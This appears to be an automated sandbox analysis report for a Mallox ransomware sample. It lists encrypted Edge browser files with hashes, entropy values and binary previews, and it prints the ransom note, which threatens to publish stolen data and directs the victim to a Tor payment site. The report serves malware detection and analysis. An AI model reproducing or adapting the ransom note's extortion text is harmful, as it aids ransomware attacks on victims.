                    File Type:DOS executable (COM)
                    Category:dropped
                    Size (bytes):2333613
                    Entropy (8bit):7.999910270357837
                    Encrypted:true
                    SSDEEP:49152:SJGexsVm01wM6SgNAn/CytBNyPQkVD6xVenH:eqYALtBNXkWenH
                    MD5:ABAA87714392CC963175459A9524BF49
                    SHA1:031A83203CEEC737D9EDAC946523396B4F8E38EE
                    SHA-256:D9551CA5EDC5FFBD48E3557A076D4788B39C11C9EDBD38BE9CF7C2BB63193995
                    SHA-512:527EFD61A58E67CFA051D1C184E63B36D3AE153185A366ED380C6420FBCA1484F7722D07C971ED7ABE55F888A2A2E8F00F889C0DE46D7A4740DCA6CF4DF22DE4
                    Malicious:true
                    Preview:.SKt{..n..|u..+..y1r)U.5..*..J+.....;=N].e0.$|.s.)o........<W.........b!..E1...n..k..( ..-.N.I..r..1.C........5X...EJ.a,....8.h...w.OB"...ZJq.I}...D...?A....j.(.x]...:.b..H.I..!/..R..`v...@].US.$....v.~C.."..Gr.;1......{....1.W..u.LAf.0.=-K..2.......4...t..@.+....(x..ax,..G.o.X7h&...d..#...-M..h....F.D......9R..do..g......SvE..o.W...|.T...w.S.u..g.4......Q.....!.M....D........#..}.$j..V.".7..:+F..>.B/x._....P......t68;..[v\....Si._..~.......7.F.P.....1...cZ...n...JN....bk...pX..l....e9aAw.@..........f.... \.p.x...2.,aM*6M...zb>-. ..U..x..S..9...[....<.(....X...Q..5.t..M..x..2..W.6K.../s..Eu....m".P..F............ 0..PtG.t. 1..\.....$.R.......U..'..[.bdf...u+,..$.P....y_.k.....DD......f1.a_.a.........y.wd`}...c/...x...hK"D.......5..P.7.....L..T...z.1.y!.zg.C.....<......Iy..G.Fy..C._\.y...Wf.K.4c.g.}.h3.3.Z........9..Q....u...ID....,.(.?...jK.p4.....Py.8H.>.. ..0.].......p....!e...1...v..8tiy.B...q...2..e.eI.....Y..FK...W.F...L.c3.....E.F

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2333613
                    Entropy (8bit):7.999926006995904
                    Encrypted:true
                    SSDEEP:49152:hjck6x6JF7C9CQPQL3KvuuJ3JMp4yTByYbsLtAdDMgIhO8:hs63MCevzUp4ZATD8
                    MD5:B5CF4855A94F61F469BFF6465FB04CEB
                    SHA1:5908A24741A42BA092B4EA45D2C39EB3808CF184
                    SHA-256:9E13C2265711E2BF8D2716DBD0B9DBF0900E944AB3CC6845959600564CAE6279
                    SHA-512:9A0218F535FC9F7FE4812B10047B3B4CB56C84875FD0C730441C27F8245047EA8D49D6D18BA06BEFF49A3221286ED6B73727664ADF96D575B12D31AB751F61ED
                    Malicious:true
                    Preview:zGe0..=U.zdWG...(....(.OD...O.k+.^5...ey...O.z.F.X&.<....=..\.f.L.LV.....}.a.!#.,...0....J...r....y......,.w.Q.2.....Z....u...v.s &.2t........c....t.>+"..o.V.p.5~..w9?.qN4 .....O.......C......Z(.n...Q.<...q..^...M....1R?-v....r.....P$.1..V.1..6!n*.".^.........H..Z!..^...`....lC.C..G...F.[.......2. ..._...I...h....".. .eU.SoS...q...[.xJ.....J.L+.nZ...k...*."B.l`n.4,.....m+5..q....4.E..m_..2Cvjr./SE0.=2...&wQ....S.......46.... ...6...U*.t......h.q...I.B.@....A.b.H.q.gI.........v..v....$>hH~d..KE.u..+..x...V...x.Hu..'.}.cE....n;..:.k=bF_!.9.....0........;^.,.Gkq.C.....%aJ3.YlJ..Nq.s...w.8}H.....qt.n..A0..D.1"fV..%..........{..Ynv....0.N..\.tn.......bf......F..'.-..GL...$..13....Tp.............n.....V0n..+..u..~...[..H......D&.....0..b....%..B..![..4....wB.8.0...[Z.......;...=..|..y.'H>fe..1.....f.aJd...............D..\..I.7.N......y...U.w.*....[..j..:......1d......<.....z.li...q.K...W..~...v.k....@D..2 }.3r.....IP....}".H.....`..6F.(..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24356
                    Entropy (8bit):7.9933357575107955
                    Encrypted:true
                    SSDEEP:384:dYJGdlWe+n5ILtZnc4znuvc/5vm3dZ3Fn+6XyXgBKaGuud0v:dYlBYuU/5+3b1n++BKPuudO
                    MD5:432903D009F08CC30B41AA8D15057D72
                    SHA1:AB533D2A6BF8B7E2C34F54118C8584EFC93CD370
                    SHA-256:7BECA35F6139C5D4257BB4A96762DB1F2DFEB15C17D2DDDBB54A356DBECDCEDF
                    SHA-512:ED6D339712245E026E2C8FF92C3C97A782A62E5B74BE5C49E750126C3ADAE7BF51953996DCDB1BDB1B275D85D96C05EBF76E76BF22D5B11BFB39714A945F98EA
                    Malicious:true
                    Preview:.#TmEQ..z........_..H.elm...f...[.eU@...=h<.....8....)..Sl+FY..{.......p.crM.t..].....(AY'.fo.-...i..*.L...A7gdR.O..*.x[.....b.........}....Vq.v;v.:4b......7Y..\.q...Ag..YP9_f{..s.!..[....@H......F.v.B.)^.....El;...}.s..{.(g..=..V...gJ.....G...=...Mno....d.T..x..8.2`...y&>..I......S...y0= ..7..kX......K.E..L..H_.&660}......._.C..t..&......@._..kU...9..,$.e....%ClI.a.....@....n4..:.M....d...s.sx..v....@.G......Q._..M..ze.[V..).gQM.;."..~...Z.#..R.6.....3.P...J..>.......T..7.q...C.O$A..U.."..s..7...;..v..-.E).".......$.~d.p@.p.5.$...W.MWj....J..A.8|.uU..w..-........x.......u^Qh..._......b......+./.XO.OM..o.[..k.Sk.t.......,.}.Rz.5Gn6...P.+...;.0s=.$...2..C...+..Tw...v<(c$.....Op.c..mkt..-G}/V..?.l)..OWoL>!.{U.).x,..M.76.Wm..<9....N..y.dHX.G..}..xTts..q?....5.t;Z|[R.....Q.g.T.....!+..H.......Wi'!..r....}...Q...7........N...<......_.....b.5.......9.'.}.J....>>....K.t..m.....>.a..:r.U.Mm..l.r.+.[)..m.....Jw...S.Y....`......Y.P.j.[.3...!6

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):28731
                    Entropy (8bit):7.993407000058418
                    Encrypted:true
                    SSDEEP:384:3QUmJjp1Y9eHszZxYi95RnH4aR6mrEBUegyr/R9jo/I8vtayfl/084:3QUmJjLYSG7l4ue9jXAO
                    MD5:909DAB79C07D659591F1332F89922626
                    SHA1:726928C8A09E914F3E0E8C3F7157682051CB41B5
                    SHA-256:72AC17664B20B6FFBC6DD75E1CA8352922552BBD1C10E772ED5A1126FC7763D6
                    SHA-512:D16332B8408889CD3B79F03F88D6E2817D8E157D5056FF7EDFB5DD7F0D7E7ED63D2271BFD3107DE719AD03CF4222B59A29B2EB7C9E7728ADE887A7045C69A6A3
                    Malicious:true
                    Preview:.....9.4..@<.e..A1..../c....z...{.Sw.....f.LVK.(.?....Gs.?..sdD...i.. .+.%.%..)|. ..3..$zl.R.....\..{....~..I.c..u.....0.u....R.....V.<v R*+.(4.c.>..(0<.........?.e..P}....R..Ff.....]...g...>...;w5.)/..Gt..V...J.....r...G.Q.*Q.....J..62..&.........#N...=.qQo.....S.D.\p...Xz.2.;...t3..u.UI....w.....9e9....;..... ..k;.....z.%.K{..Z.....z-.,..w.......~...G._......fN..Ga.C......Z.fq..!.nfF.....v.}<^\.........Z....s.Z:.#.(..2A......k...h.T..S...........L.C#.....;...CB....p...t..PN..K._T.:3;.hOjX.K.cL...8.)NI..w...u"..~0..._.m..JI..rBJ.Q~...4i[O.xhA...R..w..{..]g.S-V.%hr..........ym...12. .K}....I.&.s..^.M..h,.....r...k$....LS}...Me.r.4'..0...q..i..-.9u...@.m....=.5....h..J...'..hHy...'D..H|)[c..eZXH.....!..A:..V..........q.<...g...L9LQv..i. ..v..Cx4..N.qUZZ..d[...w.Q.".].->.R....C..=[....^~...)fI...y...I7.SN.I~.Y.+).Q./..@.........=.2.[......z..$\.*Q3a9.J....O....t>.#.e.g._.G.H%&X..a6..~.).......=.d..`<'.Tv..Q.I..z....c.....).N.. .......

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1441041
                    Entropy (8bit):7.999880980052683
                    Encrypted:true
                    SSDEEP:24576:TemDX7Kfv7v6/wMAnHM36t5NSe2v92Oq6vmN43IAaSR/M/E2kaHnLE4PD6:TemvUv7v6WDb9g/MNaoegD6
                    MD5:8A9B725500EC18300D0E1C8033A2CB7B
                    SHA1:DBC37D9BD27C579BC0B9AAA14583457A32C95E0D
                    SHA-256:F849A5905EF5AB5ED46DAAB712B7243995132D57BD1E80DF07D527A2F7FF4CF1
                    SHA-512:266429EB47500AD004313018016C1F15769600EA792734876FD911EB7B5813787E25A211273D56FC7EAC088C879729FADDBA4DDAFC98033CD75990F01E07C743
                    Malicious:true
                    Preview:...w...a.m,......!.....1...@T+E-:dG..U..j4.4....p$.k.[~1.f.fh&S...$...3.`..w...r.i. .S-c.i.-.......v.F....'.=p.c.L[.....4io...:Z...?._.W...&.$}..:.n...31W-hT..l.F.^?.j...Q,..$v..dd5.u.0o...1...3<..6c.^.Mi...xI..L..x{u....!..K..SmM>l.n.../..|.aA...f.i...U....S.U.. Ke(.7{...B...V..B............;...)i..~.Z.x...LC{.....0.W.:8......Bx#l.^.JB.)....m.?......t....V..1..jR..|.z....U.*...P...3...=o.8......_...jW..._......VQI.....vj*..2.Bl..."...X..7>....../..M..W.PC>...'.y:j.H1.:cH..82+~.["4#..$............>...x.7%..os,d..(7.Z.n./..:.......2.....D?...V.....=p.......?...iN.[...FTV.|.Y.'P...<.R..4.z....SVh..Z......t8....6Y.N..x.45..L........F.k5.+.:.(...8(.6..\..4L3..A..d5...|.Hx.;.....L..O:P7.'LP..L.E.C7B7.o.a.)...3S..GqgdV.....;.&v...4....!...Z;...<ZId..0.........`V..u.......u.`..q......n...wW.2%y.9.H=l`...>.z..8..<o.+`..HNW..&dq...6JLwy..:0|.K..>0F,#m....].Lj..`@.!.......T..+...#k.hPw...52y..A...f./.....vS...ZGNj_.R..<.!S...;V..o...CV....i.I.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2936880
                    Entropy (8bit):7.99993148825423
                    Encrypted:true
                    SSDEEP:49152:Gcu376nXtK5+W78AGn7Hk+ylCSitrft7vQ973Oh7DANReZfbpQZe0:Gcpn8SD8lC1t7tLce5D9ZTpT0
                    MD5:3BCCC6A7C80FEF6EF170DBF5B47A8225
                    SHA1:1741DB33461664ED799BF9E534498498C48D751C
                    SHA-256:A74C4F6102C35019B32DD3CDDDD0E930A8C9B2346668F4A1D32AA031507F547D
                    SHA-512:23AB7B299099956F8202FCA7BEA9C8A78CB19EFFD3F84F050EB079F4128E15D7FF1290119410A18E9C026736ED73A8E3E2C32EEF928618271CA498C800D2DAD0
                    Malicious:true
                    Preview:g.........FM.....E=7z.y.O..1..;...e.y.7....I..35;.f....w.Q2;..-yR3.\.........5J......E.\..j.:..9A<.(_....{....Z..4....W........1. .er.....#V..u....o.S...0y'...DzZ...HAa@.`Q..X.....zh7?...e.~v...A.e...3..._.0..+>..1..].tK.c..'.b..l.6.NW.[m9..6'.v..u.............Rkw6.......x...P..a.+..}.......@.G..X..e@.2.qRx...G;...x..p,.a..}.1...._.......O..*..ZU-....e.>F...!B....s,....l..^.z.O..O{.J..}^.D!.'....."......f.d?)..J..q..lZ..&......k.B._.......`..Js.d.-.)Io...7h...q...".......6..9...R.T."....[......#{x)y%.....Ld......rx.$.X-..............h.......Fs.+R...,.D..D&.`T.^....?5....d.\...B.S3.[!...r.^....-6"A.#.I..I...-+.........I..}U.p[o...G.:...~%f..o......|.H+..L<1O\S.........lB|06.7.IXy../..l#....m.P.=............E....C.R!{@...7..>.....P7..a.{@..V(.$.T..Y..gd.b= ...Q-.b;.3.D.......'L.X....=+..Y.g....V[?...i.e..d%(W..4.$...xq/.W.B~p.9...."{..|1*..b.H.j....t).C.L..c..N.A.K.).W...r].......j.;m#.... z.N......i....B .~w&Hu.....k.*.Hi.X.J

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999410951815283
                    Encrypted:true
                    SSDEEP:6144:syboEXAsFmguDqUi2/LPHUiNX6mSz80v5TkAHuU89:Db3tFSmU1/T0W6Bz80va1
                    MD5:A112DA611A3F8D84FE28C2C48B32A50D
                    SHA1:A9B3484D98B5A54D671B611DD8DA602233B321FD
                    SHA-256:97B431C762C34CCD96E3EE360F5E515F86FED41EDF4F66CCCEEBD8B7BCEE8B9A
                    SHA-512:9D99F191DD27AEFA0E972B4B4B258BEBBBFCEA822A0648F013CC02D37794F0455CDAA6562802A293C152E00F01A8A8DBE972A662973618EFC711852EAA7A5E6E
                    Malicious:true
                    Preview:.u.Wo..gAgZ..c@...~.r..%=...f.1...l..#;.fD...z.B1"K..!R/.g....+}d7./.8a.gY..].,....m.9...........J.B{.Q...f=dU.h.........^.YYW.UG.r.8%@.A.0.H..j....Xb..^..IN..ep.......^....i|....y......Z:.'h...B{......@o.V.!..%.....!>.N....G !.(7pq...[C......x..e...b:...L........b.6']t....e.U...r..6...l..........`..$ .$...[...uy=..U.5A...fJ.r.......y...0.,;.A....P|.....5Ql..:.3.3..n.X..r....6...]"u..A.!....G.A......`..y.....G....l...."G.{....:...qHS5\.?...D.A.K......bo...k.I.b.Mk..&....F......p{.b0....+...=....A.n.m.D|...<....u_.......PQ.}o.-0.1hQ0.....S=M.QU...R.ar.<..Zq..6. ...(=... bP...*H.....C......G.*"...."7.).8}..F.6...*y.u...JQ6.f.w........~`O.&....XyH>...T...1...g.../;z...F.jQ.P...z.I.a.`....G..si=.H...|.....&,8.h..9?>s..p...>B.....-..OJ..C...J..Ws.}..\.'|`...r..(.0.$l*....z.....4[........p........=.@..c.,f@JN.+/.........Y .......Ep<3qV.I1....t....}.Q...K...$...>E{. 9....N.......A.%.6.@@.z...E./.....-.>T...e..V.j................)^.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.9993132239806
                    Encrypted:true
                    SSDEEP:6144:Hq6KAT166YZYjX+Qn25Iy88bZntVLTbDh2rgQ/:ec1BiYT+D5Iyp9ntVL2
                    MD5:D371E76EE6094CCFA4343C3E24269F2C
                    SHA1:E47DA9EBE1314B22DEC7455AD48E200C4ADA1865
                    SHA-256:DA6035EF5B42EB6A29DA76B7ECEF37C79076C2DE6D050F80A87051E400CC7D79
                    SHA-512:ADDCEAA6EDEBE760C2BEA41FAA3E3AABFD4308668E0E95BF2C9F5DCAEFCBFF68ECE933E5FD61BDB1679F4520BEFBBAA20CCD5538FEB0E29D11EC604AC302C5BC
                    Malicious:true
                    Preview:?.{.......}...n].....3.,N.$.cH".{s0...:n....k;..K.gU;...U?.e...{.gq%....I.`..P.y.*...T>X5.(.].D@.1....&.}..FF.+a.!.).....&...ZAW....X+.M...).T...q..S.3E./|....W0.kC._.N..............D.#gt..\...s..o..0.E-.[....)........I.5.....JMu'&.d.6.i....qk.4.x...,hQ.0........7..i}Sx.[..3..C..?.m.g.S.... 0.1..m.V..i.....P..........V.2....RS..]A*g8..a|..G1.S.....OL...-a6x.b......&G@..C.)!X.']..\^.J..{(...@...}......C....z.H.nC.f...1......v...,..7G.9........y...$..Y....L yB..Y.......vx.....b....{.I....d.j..Z......i...o.%7..."......=.(..*.N.X...?=..&...7D'/.;|.Q.u..w..|y...{2K.C.x^g<]_...[).......@.b.....//..."g,%.Sw.\..q.......ax.......h..........4...k.}.O..u..j.w...z.ax.U.F.2:.=KfLg.......3H.......2..y~.......B.Q.%..U.Lz.."vy.Gj....P.,.)7..6D......S:...J.C....Z..\....Y...y.)..SP:k=..)+.@..R......R.Bz.0g....O.....I..,.M..a..(Y.P..N_...%?...`......YC.P..-.....r..X...-..^E..Wog..../.|@..b...i..R....3=...Ka..=.....UIs3.^0..."R*.IV..(<.).).I>.n?...H...m..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.9993179445275375
                    Encrypted:true
                    SSDEEP:6144:SK9XPQkX0t9eVkhKNrMlWxHE5DnGvmeqovCNxbRK8:Syo40lhKPGDnGvTVvCnbRt
                    MD5:C8BA10905C66943A4A39054ECB442656
                    SHA1:0C4FF7194F731C5AE874CA34B8672719639F721D
                    SHA-256:C44D51AB11C69EBF1BBF53672EF2A5D10DD9F56C97F9D6B49F591AA7C226611D
                    SHA-512:BBA1B066402EC8357308EB48533AFB6E09366C3F5F55771C6951406B262929B4C81D207269E66E00B40624D901EDF963D5E4A1CAF517BE466BECE5D72BCDDEAA
                    Malicious:true
                    Preview:D..g......(.+.z5..(..b1*@.....=.....#*......$....t..S.ae..a.l...*...C..O.....#.I8.g_.....b{.j-..:....K(@.X.....'h...p.?.C{#..`2OCO..b."./i0..30.`x..O..........m.GC....c\...z....G..\.h:..g.s.4..sr.m...c.!A...sG>.w;DG'A.V..ef*F..`}DM.,.8..6...-.0.S...c...;...#..R..&C9. e...CG..<.i.]..6..3.j~./..t./0..F.t.tK.s.~n-D.....K....C_.PK3..En...wl.T.....!.kn.H>b..:..W$........R...y....U'.....G.....g:\.........`...f....p.i=..T/.....o.[AK..N....)...{.giE......NbMk.ky.........u .Ia`}9..&.s......DJ..g.......K.!..t..(..........Q...=+...uvy....D.._...o%.....6L..*..:|..Xd%..5.....9k~>2..?74Q..z<0........}.......:[.R3.........[.qGK..m.....d.......R.q...YFsI.8....J..<.........m..w...PN...SDZG...A..j.;.'.....l..[.J!..*.o...i....E..P.'e......p. .`D.XG`...`.h.....@.|.$..JP.t....F=.}N.B.].&..._H.B8...TQ=C.Z...... .F./..5..#C.4K...........V<..;TU..[..>..ub...co@.6.Vw....X&.|.].u#.T..y..,...:..GZq}...ik..a..A..?..g. .".C\....r..y.%9......U.WG..L.....Sj

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.999339576101085
                    Encrypted:true
                    SSDEEP:6144:tGaI43YFlcqnlDwiMIrA/c3Oshp6W3VC40C5Gsjpll0o:tGctqlDw+3Lh0W31Nhp8o
                    MD5:FD9CDC318F2F4B13AD434409F257FE34
                    SHA1:4E1E06E001C846BE5303099F994A62B1ABD44F1D
                    SHA-256:B07C801E3550E3773B7748D452D1E421636D0118DEA1874597B38CC713F20629
                    SHA-512:8E776783877FA398DAA8B7AFA19ABBC14292EB851C0F619BF354812017D5964A9DF24C921A96077735B6821CC702B90BDD3EA8A598507B37D8E0021DBB0E1770
                    Malicious:true
                    Preview:...e!..2:}...G.u._...B...RHL.{...AJ..FM7....c........vw.f..y.R.S.p....[.$.q.....}..lJ...D...e...|l........gq..An......i.C..`...25.w../.......|Zf...HW..).Jn.x.R..T.....<.:"z....)..[..~.o-.Us....al.aGu....,.4..%.........}..5.....+.0z.e...:].......y.cP'..Xh\*...b...+..M6..T.0....>....i@-].2....FS.5.....Z..O.<...Y.......j........F8E.6...1-I%z..I.K....v...:^y.....?..AzjSoJ.r.uR....:@..}3.`&....`Z.t8....|Qd9.9..e..l.u..2Xx.l.K..2/..I.0..vB?...Pr...HIR.\.2......:......a..,U6.v.XD{..*V..R.....V..HJ.b..n....rfw.....<.?.l.w..U.<qzjG.C..J........n.".".A.qzF.s.2V.1..{F.%9`.b..:...oB.r.H.....jl..m...R.....2...~..DV...p.@.Lx.../vm..K.....:t$.y..B<u.P.E.U.\.Q...l..#(.....uq./....i.Iuz....g.......X..^g^9...7.....Y:^..9X.4.<&>..E,...g+.+...r.....i.C.>..I..w...t.3..O........!sL.!y.v]./...Pc .@.Au...G.qn............m......](.`.?.2.w95....c..a. P..m.-...!.G.}U...\tbE..\..x.).x.|..........~.m.:..T.o.......T<..3.!.b...!...{M.6..s....).f...@....L.i.j........u.r..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):44086
                    Entropy (8bit):7.995748432873624
                    Encrypted:true
                    SSDEEP:768:gfnxe5blG9pJq3noNV41GnUGeRL/52L9f+AiwUPjyKla2NT5rVf61qBD7:SnebGPqinWA9f+AjUPjJaKFrVfeqBX
                    MD5:85634850614B3F0F2644939116BE73BF
                    SHA1:1F3AF735916889360678CF6CF6FC0F7AA06E515B
                    SHA-256:33EE1F69EB51BF76F2D056F8DCD75B7B6FB907C18AD072F0D19FB3A1EB4B48AC
                    SHA-512:9F1D3E12B21C46661D65207D42F6C44E39C9F3D7895916D46C85DB5654F268AD9291BB2A8B3B664AFD11B87A922D9885CCCCFBA1FF7E9749809E0AC50EE0EA2B
                    Malicious:true
                    Preview:)...A.-....T..)...5>....b|.3....g.)A..R.2.:5f.7..cZ|DxO....s...1..8x.d."....S\t..I..E./T...+.>*{S3.......+........5.W.6.S..W.8OF.....(....1eC'C...J.~......|S..h.j.."Iw.....i.#.....s.U.`"..o.?......A.|!...v....I.....c.....V....4.V......r..G....<..<B.l6...Ww..h.-...:.Z....f.H..O/....2:S.DL.J..k.}..48B...1.U../......d=...j.WRux."c.F..Y_F.S2.......s?.C?.+..g.].s.....%.<...^.j...g.......iW......$../.../.3..u.[.FJ%g.R....z....W{.4.%H2..,.m.....[>...8,.3(.........\(....L.Hb...)3AG..b.e-../..... *J..>..U..A.s.D'..c.).Q.N.V.!....x.:..j."c.do7......(....bk-z. h.a.O!..>...>.\...k/0.T.b.K.e....<.`.....\k&<r.T........d.~X..P.B.....x.........7.d...*......].C(.:l(....Vt.............&....x...Uo!.~...{....B*.1...*......j...g...wO.Y.c0...Kd`.x6..*......."n...|.Z.~...v.....s......d....|...%..9....-..q.s...kO'...n....]R...x..kK.E....N.e...j......Bj.....Iy...O.<...S.....MFk`......\.......ku7H..N.........Y...4A..@^.....W*A.7z.u..5....O..nX8X(..... ....&.a.D......J..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.991940022230603
                    Encrypted:true
                    SSDEEP:384:y6MBRASKX0SljZlAP1tYtKw5TV1v68zI1ZA4R/EwJcVB2sGL:jgAnESljn2OK2h1vfT49EwJFsGL
                    MD5:0F79D6478909349564A03D213751A07B
                    SHA1:AF5C03C57A9D79657F0F70138D1767746441776C
                    SHA-256:6C98EB1995DB287F5F893771C91DD3A169CE6DEBEDC0BE20623CECF5306FA56F
                    SHA-512:923AC6EB77F30D5473CBD0B7C18FD8C0B669B1AE44E812B4A6160FFF145BD2F6ACB6B18A5328AD1B2B218DFC6C8D4E21BB503305B7D704C46FA0F654621CDCD5
                    Malicious:true
                    Preview:.XO.v.sC....................h....Me.Y.{...r.Z..*\). .W.....A.Zp........YcW............6..Q(......r..l./r..20.i|.........*:..K...G~.<-.zR]d(..0m|...Nrh..c..$j.7....Z.B....{....Zz.-.2Ac.w..v....L...*..........=;m..7X.<...Y...7..8cR.=B..cC6Wyh......'^lD.s} .j.Y^....b...l..0r.C.'p..k.*..f...........+..'.Sc..........:.C..Z.|.5_.k..0QbQ........K.1F..+..q..p.....r.6.....j*nb..4.p.g..!...(..\..k....6..p`g.....'|.6..h-..-B..K.i|j..,M9..s%..,.$...y.s 3.............J.. .b......~...._#\q.+JV&.pR........K43._r/*..q....USG-..ibVLyE.gt...*G]..G;.:..23..-P%.O.4k$....L.Z|....S.'{...1].H..z...X.....a...X.`.g.....V.....u..CrLj.\.B.......].PzA.@.I....[Z....I.......p.+..2.O..%.f.x.'9...?./[.....r.>[.n.y.R.?.....K.^A....|........+.A......2......T1..s.iI...&u.r.W/Q.T..4.....8dEHu.r.s.{..Q.j..x."CK..>v7.}.&O.hc.8..\..].P.'....;&..2$=..^....{...@l5...f...).%Vg.t...G.s..<.......F.D.}D.u.....".O.....Vb..T....l7.5.#.9.iD...).N.....^3A..0`.F.k........i.-.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0\crs.pb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):275070
                    Entropy (8bit):7.9993405793011165
                    Encrypted:true
                    SSDEEP:6144:ZxE5pscyawBtRhmy6a/kctkLFQk37UdFpTxtvK:ZxE56yytRhnVteQk37UdFptNK
                    MD5:A95D96B82FCC05C146319A7D1E3E01A6
                    SHA1:C89C226AEF14CA5A4A8742E247C350E4ADCB75D0
                    SHA-256:04D4BC2BF409210809478CD9ABD5B9B821D482A87F1496A27B7F81562E1C061C
                    SHA-512:DAD1D97FCCD99DB58A89B77B3681A4D1E9012880A43CB96E57123F7165B724CE5B97AD549DAFC584213100E5E207CF0A894E9B59CFE458CDAD76D426B91FE189
                    Malicious:true
                    Preview:.....!50..q?....nA.=qEI.+.Ax...Aqdf..e...........S..-....W..q.F........>...l.0.X.../MZ..ke....&F....k....U^...f,bu.N..1C0..N..<.....|..cy....nX.......=i1.l..Qz.XTA1..5.X....rc....1VA..<.[....;...Y9(.-....M#.>)..@..C...0.......'hA2..I.....w......G.....&.3....g-.../3.?t.I{...."!.>.....K..NP|"...........!..=..VM..Y.~.A.6.....M..^.r.......,..k...?.A.....x..)<..}....1.......O.{.hR.9Ax....V..C....|..8....O......%r.(.%...kX...\KiG_..h.&...0k.......?..m.......qkw..S....!...\.^Z.P9A.5..-..{.&..4..@./...'(..9..2{c...,....<."p.;5..c`....)Yt....'....0..q.t......_./.R...x...li. (.!..U..Vfl.(....@....q...W.y..e5{..I...j.....&y>..<.&<.,y...k....._t..vt......!.!...|o.......=.Tn...f.........Ol....;.n.;991F..'..J.@.G.s.d?gg.*.voL.[n:`....H*.U...3bE..j..D......K> '...X..u..@._....l...9..tPe....|]....(o.....' !..G.(......5.B...o..uR...x7"L....r=~s.e....2w.lb9.M.].I.*.a.......T.7&..g..<=z.+%N".......FY$~.1...>x..a.J.|.......M$d..x.tmJ.v.y.)

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2090621
                    Entropy (8bit):7.999909397253525
                    Encrypted:true
                    SSDEEP:49152:UkfNieVdQ120HJu7njgZ7B7PfPqBvWehbbbZCmvvBZJIag:UGYE/gZ1j6BvW6fbZfvFI1
                    MD5:1663DFCA4A1AFF328F1C6A4F7ADC002C
                    SHA1:4DC61DC590549D14EB10F0193A9256B8BDAD4E62
                    SHA-256:1AEC81FD3D1342D68AB3A68AD8992BBD569C431535B98EFF7A1EDC2E100E7F98
